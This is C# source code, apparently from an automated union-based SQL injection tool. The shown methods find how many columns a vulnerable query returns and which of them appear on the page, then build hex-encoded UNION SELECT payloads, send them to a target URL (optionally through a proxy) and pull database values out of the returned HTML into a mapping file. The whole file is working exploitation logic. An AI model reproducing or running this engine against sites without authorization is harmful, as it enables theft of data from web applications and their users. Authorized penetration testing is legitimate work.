public string GetSingleCustomQueryResultRow(int startingFrom)
{
string results = string.Empty;
StringBuilder sbResult = new StringBuilder();
string generatedPayload = PayloadDetails.Payload;
if (PayloadDetails.Params != null && PayloadDetails.Params.Count() > 0)
{
foreach (var param in PayloadDetails.Params)
{
generatedPayload = generatedPayload.Replace("{" + param.Position + "}", PayloadHelpers.GetData(param.Name, this));
}
}
StringBuilder sbCurExploit = new StringBuilder();
int columnIndexCounter = 0;
string generatedPayloadWithLimit = string.Empty;
for (int j = 0; j < _nrCols; j++)
{
if (PayloadDetails.ExpectedResultType == Enums.ExpectedResultType.Multiple)
{
generatedPayloadWithLimit = string.Format(PayloadHelpers.GetSingleResultLimiter(PayloadDetails.Dbms), generatedPayload, startingFrom + j);
}
if (_visibleColumnIndexes.Contains(j))
{
/*
* sbCurExploit.AppendFormat(GeneralPayloads.UnionBasedSelectCountedResultWrapper, _visibleColumnIndexes[columnIndexCounter],
* (PayloadDetails.ExpectedResultType == Enums.ExpectedResultType.Multiple) ? generatedPayloadWithLimit : generatedPayload);
*/
sbCurExploit.Append(GeneralPayloads.UnionBasedSelectCountedResultWrapperPart1);
sbCurExploit.Append(UrlHelpers.HexEncodeValue(string.Format(GeneralPayloads.UnionBasedSelectCountedResultWrapperPart2,
_visibleColumnIndexes[columnIndexCounter])));
sbCurExploit.AppendFormat(GeneralPayloads.UnionBasedSelectCountedResultWrapperPart3,
(PayloadDetails.ExpectedResultType == Enums.ExpectedResultType.Multiple) ? generatedPayloadWithLimit : generatedPayload);
columnIndexCounter++;
}
else
{
sbCurExploit.AppendFormat(j.ToString());
}
if (j < _nrCols - 1)
{
sbCurExploit.Append(",");
}
}
string query = QueryHelper.CreateQuery(Url, ExploitDetails.Exploit, sbCurExploit.ToString());
string pageHtml = QueryRunner.GetPageHtml(query, UseProxy ? ProxyDetails : null);
IList <string> resultsBatch = HtmlHelpers.GetMultipleAnswersFromHtml(pageHtml, query, ExploitDetails, DetailedExceptions);
string actualValue = string.Empty;
int separatorIndex = 0;
int columnIndex = 0;
string columnIndexString = "";
IList <int> columnsProcessed = new List <int>();
foreach (string singleResult in resultsBatch)
{
//@TODO: strip scripts
separatorIndex = singleResult.IndexOf(GeneralPayloads.UnionBasedResultSeparator);
if (separatorIndex != -1)
{
columnIndexString = singleResult.Substring(0, separatorIndex);
if (!int.TryParse(columnIndexString, out columnIndex))
{
continue;
}
if (columnsProcessed.Contains(columnIndex))
{
continue;
}
else
{
columnsProcessed.Add(columnIndex);
}
actualValue = singleResult.Substring(separatorIndex + GeneralPayloads.UnionBasedResultSeparator.Length);
if (!string.IsNullOrEmpty(MappingFile))
{
XmlHelpers.SaveToMappingFile(MappingFile, PayloadDetails, actualValue, this,
(this.ExploitDetails != null) ? this.ExploitDetails.Dbms : string.Empty);
}
sbResult.Append(actualValue);
sbResult.Append(Environment.NewLine);
}
if (columnsProcessed.Count == _visibleColumnIndexes.Count)
{
break;
}
}
return(sbResult.ToString());
}
public bool TestIfVulnerable()
{
bool result = false;
StringBuilder sbCurExploit = new StringBuilder();
string query = string.Empty;
string pageHtml = string.Empty;
if (string.IsNullOrEmpty(Url))
{
throw new Exception("No url provided so cannot test vulnerability");
}
for (int i = 0; i < _maxCols; i++)
{
if (i > 0)
{
sbCurExploit.Append(",");
}
//sbCurExploit.AppendFormat(GeneralPayloads.UnionBasedSelectValue,i);
sbCurExploit.Append(UrlHelpers.HexEncodeValue(string.Format(GeneralPayloads.UnionBasedSelectValue, i)));
//ExploitDetails - check if null because it breaks
query = QueryHelper.CreateQuery(Url, ExploitDetails.Exploit, sbCurExploit.ToString());
pageHtml = QueryRunner.GetPageHtml(query, UseProxy ? ProxyDetails : null);
if (pageHtml.Contains(GeneralPayloads.UnionBasedErrorMessage) && !pageHtml.Contains(GeneralPayloads.UnionBasedTestValue))
{
continue;
}
else
{
if (i > 0)
{
_nrCols = i + 1;
var stringResults = HtmlHelpers.GetMultipleAnswersFromHtml(pageHtml, query, ExploitDetails, DetailedExceptions);
_visibleColumnIndexes = stringResults.Where(r => !string.IsNullOrEmpty(r)).Distinct().Select(r => int.Parse(r)).ToList();
_nrVisibleCols = _visibleColumnIndexes.Count();
if (_nrVisibleCols > 0)
{
#region write to mapping file
if (!string.IsNullOrEmpty(MappingFile))
{
XmlHelpers.ChangeMappingFileElementValue(MappingFile, "/map/injection-strategy/columns/originalquery", _nrCols.ToString(),
this, (this.ExploitDetails != null) ? this.ExploitDetails.Dbms : string.Empty);
XmlHelpers.ChangeMappingFileElementValue(MappingFile, "/map/injection-strategy/columns/resultinghtml",
_nrVisibleCols.ToString(), this, (this.ExploitDetails != null) ? this.ExploitDetails.Dbms : string.Empty);
XmlHelpers.ChangeMappingFileElementValue(MappingFile, "/map/injection-strategy/columns/indexes",
ListHelpers.ListToCommaSeparatedValues(_visibleColumnIndexes),
this, (this.ExploitDetails != null) ? this.ExploitDetails.Dbms : string.Empty);
}
#endregion write to mapping file
result = true;
}
else
{
result = false;
break;
}
}
else
{
result = false;
}
break;
}
}
return(result);
}
